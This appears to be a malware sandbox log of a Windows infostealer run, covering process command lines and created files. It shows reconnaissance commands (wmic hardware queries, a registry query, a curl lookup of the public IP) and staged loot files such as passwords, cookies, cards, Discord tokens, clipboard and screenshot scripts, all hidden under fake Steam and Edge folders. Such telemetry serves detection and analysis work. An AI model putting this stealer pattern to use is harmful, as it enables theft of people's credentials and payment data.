C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee031ab58,0x7ffee031ab68,0x7ffee031ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3560 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4908 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffed84746f8,0x7ffed8474708,0x7ffed8474718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed84746f8,0x7ffed8474708,0x7ffed8474718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=2136 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6128 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4704 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2916 /prefetch:2
Network
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
C:\Users\Admin\AppData\Local\Temp\temp.ps1
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dw5ramhy.pnl.ps1
\??\c:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\coslunty\CSC49F411F94BF644DD95F3BEBC997E183B.TMP
C:\Users\Admin\AppData\Local\Temp\RES4083.tmp
C:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.dll
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
C:\ProgramData\edge\Updater\RunBatHidden.vbs
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\CSC88193676E09C4075BE3495B5E738BB2C.TMP
C:\Users\Admin\AppData\Local\Temp\RES4769.tmp
memory/2600-190-0x000001E2A8700000-0x000001E2A8708000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.dll
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\stolen_files.zip
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Serial-Check.txt
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Passwords\Passwords.txt
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Discord\discord.txt
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\debug.log
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Cookies\Google_Default.txt
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Cards\Cards.txt
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Autofills\Autofills.txt
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1
C:\ProgramData\Steam\Launcher\EN-Tmuacblb.zip
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Screenshots\Screenshot.png
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\ProgramData\Steam\Launcher\EN-TMU~1\debug.log
\??\pipe\crashpad_1936_ZHELEHSDTFCUZMZO
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\7860fb57-cbcf-4ca4-b2b2-27472d461584.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe588af5.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.roblox.com_0.indexeddb.leveldb\MANIFEST-000001
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity